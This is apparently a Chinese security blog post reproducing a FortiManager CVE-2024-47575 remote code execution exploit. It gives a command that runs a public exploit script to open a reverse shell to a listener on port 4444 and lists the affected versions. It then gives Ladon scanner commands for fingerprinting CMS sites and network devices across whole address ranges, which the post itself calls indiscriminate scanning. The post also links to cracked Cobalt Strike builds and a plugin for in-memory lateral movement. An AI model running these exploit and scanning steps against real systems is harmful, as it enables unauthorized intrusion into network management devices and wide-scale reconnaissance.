logo

K8哥哥

没有绝对安全的系统

FortiManager CVE-2024-47575 RCE漏洞复现

Exp Ladon 2024/11/20

<% Visit %>

Ladon信息收集、资产探测、WhatCMS识别 飞塔FortiManager

使用http访问查看图片

cve-2024-47575 漏洞复现 反弹Shell

1
2
LadonGUI---NetCat---监听4444
python CVE-2024-47575.py --target 192.168.1.110 --lhost 192.168.1.8 --lport 4444 --action exploit

使用http访问查看图片

影响版本

1
2
3
4
5
6
7
8
9
10
FortiManager 7.6.0
FortiManager 7.4.0 through 7.4.4
FortiManager 7.2.0 through 7.2.7
FortiManager 7.0.0 through 7.0.12
FortiManager 6.4.0 through 6.4.14
FortiManager 6.2.0 through 6.2.12
FortiManager Cloud 7.4.1 through 7.4.4
FortiManager Cloud 7.2.1 through 7.2.7
FortiManager Cloud 7.0.1 through 7.0.12
FortiManager Cloud 6.4

https://github.com/watchtowrlabs/Fortijump-Exploit-CVE-2024-47575

模块名称

WhatCMS、CMS、CmsInfo等,Cobalt Strike下用法一致,输入URL,仅识别URL对应指纹,输入非URL时,会探测常见CMS网站、网络设备、打印机、路由器、防火墙、VPN等,由于端口多速度慢,但收集的资产会更全(前提是目标有)

指定URL

1
2
Ladon http://192.168.1.8 CMS
Ladon http://192.168.1.8 WhatCMS

指定IP

1
2
Ladon 192.168.1.8 CMS
Ladon 192.168.1.8 WhatCMS

批量URL

1
Ladon url.txt CMS

PS:TXT可存放IP、IP:Port、URL等格式

批量IP

1
2
Ladon ip.txt WhatCMS
Ladon noping ip.txt CMS

指定C段

1
2
3
4
5
Ladon 192.168.1.8/24 WhatCMS
Ladon noping 192.168.1.8/24 CMS

Ladon 192.168.1.8/24 WhatCMS
Ladon noping 192.168.1.8/24 CMS

指定B段

1
2
3
4
5
Ladon 192.168.1.8/b WhatCMS
Ladon noping 192.168.1.8/b CMS

Ladon 192.168.1.8/b WhatCMS
Ladon noping 192.168.1.8/b CMS

指定A段

1
2
3
4
5
Ladon 192.168.1.8/a WhatCMS
Ladon noping 192.168.1.8/a CMS

Ladon 192.168.1.8/a CMS
Ladon noping 192.168.1.8/a CMS

批量C段

1
2
3
4
5
Ladon ip24.txt CMS
Ladon ipc.txt CMS

Ladon noping ip24.txt CMS
Ladon noping ipc.txt CMS

PS: TXT存放多个目标的C段IP

批量B段

1
2
Ladon ip16.txt CMS
Ladon noping ip16.txt CMS

PS: TXT存放多个目标的B段IP

批量网段

1
2
Ladon cidr.txt CMS
Ladon noping cidr.txt CMS

PS: TXT存放各种IP网段,全网无差别扫描

更多功能 使用教程

http://k8gege.org/Ladon/

CS下载

CS 3.12 3.13 4.3 4.4 K8破解版
000为原始试用版本(部分未找到,大家可以提供给我更新)
https://github.com/k8gege/Aggressor/releases/tag/cs

CS内存加载Ladon插件

Cobalt Strike 内存加载Ladon插件内网渗透
https://k8gege.org/p/cs_ladon.html

Download

LadonGo (ALL OS)

https://github.com/k8gege/LadonGo/releases

Ladon (Windows & Cobalt Strike)

PowerLadon: https://github.com/k8gege/PowerLadon
历史版本: https://github.com/k8gege/Ladon/releases
911版本:http://k8gege.org/Download

转载声明

K8博客文章随意转载,转载请注明出处! © K8gege http://k8gege.org

扫码加入K8小密圈

转载声明: K8博客文章随意转载,转载请注明出处! © K8gege
Total:
Copyright © 2020 | Powered by K8gege